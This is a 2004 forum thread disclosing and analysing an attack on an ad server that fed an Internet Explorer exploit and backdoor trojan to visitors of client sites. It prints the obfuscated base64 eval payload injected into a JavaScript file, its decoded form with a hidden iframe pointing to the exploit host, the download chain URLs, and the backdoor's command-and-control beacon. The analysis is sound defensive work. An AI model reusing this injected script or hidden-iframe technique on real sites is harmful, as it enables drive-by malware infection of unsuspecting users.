Warning to Internet Explorer users

by **Matt** » Sat Nov 20, 2004 3:45 pm

It seems a few servers have been hacked this morning which has allowed for Internet Explorer exploit code to be distributed to possibly millions of clients. One of the main players involved is Falk eSolutions AG. It seems Falk eSolutions AG is a large advertising company that dishes out ads to various sites. Hackers were successful in modifying Javascript code returned to Internet Explorer users that allows the exploit to take place. The user is redirected to a page on http://search.comedycentral.com that hosts the exploit code. From there several downloader trojans are used to finally download a backdoor trojan from http://gamedev.he.net. The backdoor trojan can then be used to gain full control of your PC.

All users of Internet Explorer except for those running Service Pack 2 on Windows XP are vulnerable. Microsoft has yet to release a patch for all other versions. A US CERT warning contains more details. Users of other versions of Internet Explorer should disable scripting immediately. I've contacted Falk eSolutions AG twice by telephone and e-mail. Their only response so far has been "Thank you for this information". Their support staff have been rather clueless. With figures of 12 billion page impressions a month well ... you do the math, it doesn't look good for them.

Hopefully I'll hear more from them soon. In the mean time please everyone update their virus definitions and check you haven't been caught out. One of the sites using ads from Falk eSolutions AG is The Register so any readers there take extra care.

**Sponsor:**

by **Matt** » Sun Nov 21, 2004 10:56 pm

Silence from Falk eSolutions AG. The offending code has been removed though and so have all the binaries after I contacted each of the sites. The Register is now following this story. Funny what a few e-mails can bring about.

by **Matt** » Mon Nov 22, 2004 4:21 am

Well finally the word seems to be getting out. Slashdot have now listed the article. I've decided to list the e-mail that was sent to Falk eSolutions AG and The Register documenting what was changed at Falk's site. Not very detailed but I wrote it in a hurry. I made the mistake of thinking it was an earlier IFRAME exploit of Internet Explorer but it seems it was not.

Hi,

It seems your servers have been hacked and are part of a large network to
install a trojan to every computer that is running Internet Explorer and either
visits your site or any sites of your customers.

The infected file is http://data.as-eu.falkag.net/server/asldata.js. Right at
the end of the file is an eval statement:

Code: Select all
eval(b("dmFyIGJpa2t5ID0gZG9jdW1lbnQuY29va2llOwogIGZ1bmN0aW9uIGdldEN vb2tpZShuYW1lKSB7IC8vIHVzZTogZ2V0Q29va2llKCJuYW1lIik7CiAgICB2Y XIgaW5kZXggPSBiaWtreS5pbmRleE9mKG5hbWUgKyAiPSIpOwogICAgaWY gKGluZGV4ID09IC0xKSByZXR1cm4gbnVsbDsKICAgIGluZGV4ID0gYmlra3 kuaW5kZXhPZigiPSIsIGluZGV4KSArIDE7IAogICAgdmFyIGVuZHN0ciA9IGJ pa2t5LmluZGV4T2YoIjsiLCBpbmRleCk7IAogICAgaWYgKGVuZHN0ciA9PSAt MSkgZW5kc3RyID0gYmlra3kubGVuZ3RoOwogICAgcmV0dXJuIHVuZXNjYX BlKGJpa2t5LnN1YnN0cmluZyhpbmRleCwgZW5kc3RyKSk7CiAgfSAgIAogIH ZhciB0b2RheSA9IG5ldyBEYXRlKCk7CiAgdmFyIGV4cGlyeSA9IG5ldyBEYXRl KHRvZGF5LmdldFRpbWUoKSArIDI4ICogMjQgKiA2MCAqIDYwICogMTAwMC k7IC8vIHBsdXMgMjggZGF5cwogIGZ1bmN0aW9uIHNldENvb2tpZShuYW1lL CB2YWx1ZSkgeyAvLyB1c2U6IHNldENvb2tpZSgibmFtZSIsIHZhbHVlKTsKIC AgIGlmICh2YWx1ZSAhPSBudWxsICYmIHZhbHVlICE9ICIiKQogICAgICBkb 2N1bWVudC5jb29raWU9bmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAiO yBleHBpcmVzPSIgKyBleHBpcnkudG9HTVRTdHJpbmcoKTsKICAgIGJpa2t5I D0gZG9jdW1lbnQuY29va2llOyAvLyB1cGRhdGUgYmlra3kKICB9CnZhciBkZ XRlY3QgPSBuYXZpZ2F0b3IudXNlckFnZW50LnRvTG93ZXJDYXNlKCk7CmZ1 bmN0aW9uIGNoZWNrSXQoc3RyaW5nKQp7CiAgICAgICAgcGxhY2UgPSBkZ XRlY3QuaW5kZXhPZihzdHJpbmcpICsgMTsKICAgICAgICB0aGVzdHJpbmcg PSBzdHJpbmc7CiAgICAgICAgcmV0dXJuIHBsYWNlOwp9CiAgICAgICAgCiA gICAgICAgdmFyIGNuYW1lPSJEQmNDIjsKICAgICAgICBpZiAoZ2V0Q29va2l lKGNuYW1lKSA9PSBudWxsICYmIGNoZWNrSXQoJ3dpbicpICYmIGNoZWNrS XQoJ21zaWUnKSApCiAgICAgICAgewogICAgICAgICAgICAgICAgLy8gZmVl ZAogICAgICAgICAgICAgICAgZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgc3Jj PSJodHRwOi8vMTk5LjEwNy4xODQuMTQ2L3UvYy5odG1sIiB3aWR0aD0wIGh laWdodD0wIHN0eWxlPSJ2aXNpYmlsaXR5OmZhbHNlIj48L2lmcmFtZT4nKTs KICAgICAgICAgICAgICAgIHNldENvb2tpZShjbmFtZSwgTWF0aC5yYW5kb2 0oKSo2NTAwMCk7CiAgICAgICAgfQo="));

That's whats been replaced. If you evaluate the function you receive:

Code: Select all
var bikky = document.cookie; function getCookie(name) { // use: getCookie("name"); var index = bikky.indexOf(name + "="); if (index == -1) return null; index = bikky.indexOf("=", index) + 1; var endstr = bikky.indexOf(";", index); if (endstr == -1) endstr = bikky.length; return unescape(bikky.substring(index, endstr)); } var today = new Date(); var expiry = new Date(today.getTime() + 28 * 24 * 60 * 60 * 1000); // plus 28 days function setCookie(name, value) { // use: setCookie("name", value); if (value != null && value != "") document.cookie=name + "=" + escape(value) + "; expires=" + expiry.toGMTString(); bikky = document.cookie; // update bikky } var detect = navigator.userAgent.toLowerCase(); function checkIt(string) { place = detect.indexOf(string) + 1; thestring = string; return place; } var cname="DBcC"; if (getCookie(cname) == null && checkIt('win') && checkIt('msie') ) { // feed document.write('<iframe src="http://199.107.184.146/u/c.html" width=0 height=0 style="visibility:false"></iframe>'); setCookie(cname, Math.random()*65000); }

Note the line "document.write('<iframe src="http://199.107.184.146/u/c.html"
width=0 height=0 style="visibility:false"></iframe>');". That's a link to the
exploit where the shellcode is located. After that it's fairly complicated.
There's three other sites I've located so far that are linked with this.

Microsoft has patched the exploit a while ago but I'm sure there are still many
users unpatched and are now infected.

If you need any additional information then just let me know.

Matt

by **Matt** » Mon Nov 22, 2004 4:32 am

One misconception is that it was just The Register that was affected. This is not correct. It was any customer of Falk's serving ads. Just check their list of publishers. Some big names there. I hope they're all going to apply the same pressure in respect to getting answers as The Register is.

by **Matt** » Mon Nov 22, 2004 1:39 pm

The Register have updated their site with a response from Falk AG. One interesting point thought:

The weak point occurred due to a memory leak on the load balancer

Since when does a memory leak allow a server to be hacked?

by **Matt** » Mon Nov 22, 2004 2:22 pm

Does someone care to explain? No sooner do I post the link to The Register regarding a statement from Falk AG then the whole article changes. Unfortunately my cache was overwritten. If someone has a copy of it before the change can they please PM it to me. Thanks!

by **Matt** » Mon Nov 22, 2004 4:50 pm

Falk statement on Bofra attack

By Falk eSolutions
Published Monday 22nd November 2004 10:04 GMT

Site notice On Saturday, The Register suspended service by third party ad serving supplier, Falk, following security issues detailed here.

Falk fixed the problem within six hours of notificatin. Here is its account of what went wrong:

Summary
Incident at delivery level - Between 6:10 AM and 12:30 AM (GMT) on Saturday, 20th November 2004 Falk sSolutions clients using AdSolution Global experienced problems with banner delivery. This started on Saturday morning with a hacker attack on one of our load balancers. This attack made use of a weak point on this specific type of load balancer. The function of a load balancer is to evenly distribute requests to the multiple servers behind it. The system concerned was only used to handle a specific request type to our ad server and has now been investigated. The results are outlined in this document.

Description of the problem
The use of a weak point in one of our load balancers type FLB02/CP lead to user requests not being passed to the ad servers. Instead the user requests were answered with a 302 redirect. This happened with approximately every 30th request. Users visiting websites that carry banner advertising delivered by our system were periodically delivered a file from the compromised site. This file tries to execute the IE-Exploit function on the users' computer.

Problem analysis
The weak point occurred due to a memory leak on the load balancer concerned. After the load balancer was taken out of service on Saturday at 11:30 AM (GMT) this was no longer possible. Because of this it was difficult at the beginning to find an error on our side. The servers that deliver the banners were not affected at all. Only afterwards we were able to find the error on the load balancer by analysing its log files.

Results of investigation
By attacking a single load balancer type FLB02/CP it was possible for users to be redirected to 'search.comedycentral.com' which tried to install the exploit type 'Bofra/IFrame-Expoit'. With approximately every 30th request for banner media this redirect occurred.

Further measures
The load balancer concerned has been taken out of service indefinitely and has been replaced with a newer model. An additional monitoring has been instated that supervises the load balancing process and whether this has been interrupted of manipulated. Further, a policing tool that supervises redirects to unknown, erroneous or infected files has been deployed.

by **Matt** » Mon Nov 22, 2004 9:42 pm

Anatomy of the attack

1. http://data.as-eu.falkag.net/server/asldata.js

The hacked Falk eSolutions AG server returned a document to the user containing the location of the exploit code via an IFRAME element.

document.write('<iframe src="http://199.107.184.146/u/c.html" width=0 height=0 style="visibility:false"></iframe>');

2. http://199.107.184.146/u/c.html

A hacked Comedy Central server hosted the exploit code in HTML format. The document was 8 474 bytes and in Unicode format. Included in the document was Javascript to perform the buffer overflow. The shell code created by the exploit was 330 bytes. It contained instructions to download an executable from 3.

3. http://www.plasia.com/u/l.exe

A trojan downloader, Trojan-Downloader.Win32.Small.aaq was used to download the final backdoor from 4. The trojan was 3 114 bytes and saved to the root directory of C: as bla.exe.

4. http://216.218.240.58/u/w.exe

The final trojan, Backdoor.Win32.Agent.ec was saved to the root directory of the C: as winampa.exe and bla.exe was deleted. The trojan was 47 616 bytes.

Hosts
199.107.184.146 search.comedycentral.com
216.218.240.58 gamedev.he.net

References
Backdoor.Win32.Agent.ec
Trojan-Downloader.Win32.Small.aaq

by **Matt** » Mon Nov 22, 2004 9:46 pm

I've created a little further detail as all the news sites including The Register and Falk eSolutions AG seemed to have gotten it wrong. It's not Bofra but in fact Backdoor.Win32.Agent.ec. This was a carefully planned attack and not a virus.

by **Matt** » Tue Nov 23, 2004 4:50 am

Marcus Sachs of the SANS Internet Storm Center has asked the question "Why doesn't the exploit affect Internet Explorer users running on Windows XP with Service Pack 2? Is it because Service Pack 2 turns off certain scripting features? Or is it the way Service Pack 2 handles buffer overflows?"

The first time I noticed that something was wrong was that Internet Explorer was stuck on "Opening page http://199.107.184.146/u/c.html...". The system then became sluggish and non-responsive. After inspecting the Javascript in the document it seems the code would first create a block of memory filled with a certain sequence of bytes and then copy that block of memory whilst adding the shell code to it 700 times. This was the cause of the sluggishness as the system was running low on resources. So from that I would conclude that either the buffer overflow doesn't exist in the Service Pack 2 version of the binary or it's handling them differently.

by **Matt** » Wed Nov 24, 2004 12:36 am

After a closer look at the two executables that were involved in the hack, it's clearer the chain of events. Looking at the PE header for both executables reveals when they were compiled:

l.exe 41910D34 Tue Nov 09 20:32:20 2004
w.exe 419524BE Fri Nov 12 23:01:50 2004

The address http://216.218.240.58/u/w.exe was hardcoded into l.exe so if the executable was compiled on the 9th of November then the next site in the chain, http://216.218.240.58, had to have been compromised before that date. The hacker had to know in advance where each piece of code would be hosted so they would have already had to have that site under their control. It's impossible to determine when either http://search.comedycentral.com or http://www.plasia.com were compromised without access to their systems as the date returned from the HTML document hosted on http://search.comedycentral.com only contained the time and date of the response. Hopefully the webmasters at both http://search.comedycentral.com and http://www.plasia.com can shed more light on this.

The attack on Falk AG would have been carefully planned after the hacker found a backdoor to their systems. The Javascript that was modified was code only found on their site so the hacker must have taken the time to analyze the site to find the appropriate document to inject the redirect into. It turned out they chose http://data.as-eu.falkag.net/server/asldata.js and used document.write('<iframe src="http://199.107.184.146/u/c.html" width=0 height=0 style="visibility:false"></iframe>'); to redirect users to search.comedycentral.com which was already hosting the buffer overflow document in HTML format.

It seems the whole idea behind the attack was to install Backdoor.Win32.Agent.ec on as many PCs as possible. Backdoor.Win32.Agent.ec is a backdoor that can be used to remotely control PCs. For what purpose the hacker wished to use those PCs is unclear.

by **Matt** » Thu Nov 25, 2004 9:19 am

Analysis of the Backdoor.Win32.Agent.ec trojan used in the attack, w.exe, has revealed the destination of two IP addresses which the hacker is using to gather information on infected PCs. The two addresses, 218.65.86.24 and 221.5.250.102, are both located in China. The first is under the ownership of China Telecom and the second, the China Network Communications Group Corporation.

An infected PC will send a request to either of the sites with the details of the port the PC is listening on. In the example below, the trojan was listening on TCP port 5535.

Code: Select all: GET /?p,5535,0,0.11,0 HTTP/1.0 Host: 218.65.86.24:80 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Connection: close Accept-Encoding: none Cookie:

When infection first occurs, a random name is generated and assigned to the executable which is then copied into the %windir%\System32 directory along with a .dat file of the same name. The executable is again 47 616 bytes and the dat file, 64 bytes. The dat file contains an encoded string which is sent as the cookie.

A registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run called JavaUpdate0.07 is created that points to the trojan so that it may run each time the computer restarts and will again update one of the two Chinese servers with the new port it is listening on.

Users are urged to block both addresses immediately to prevent further computers from being controlled and to update all virus definitions.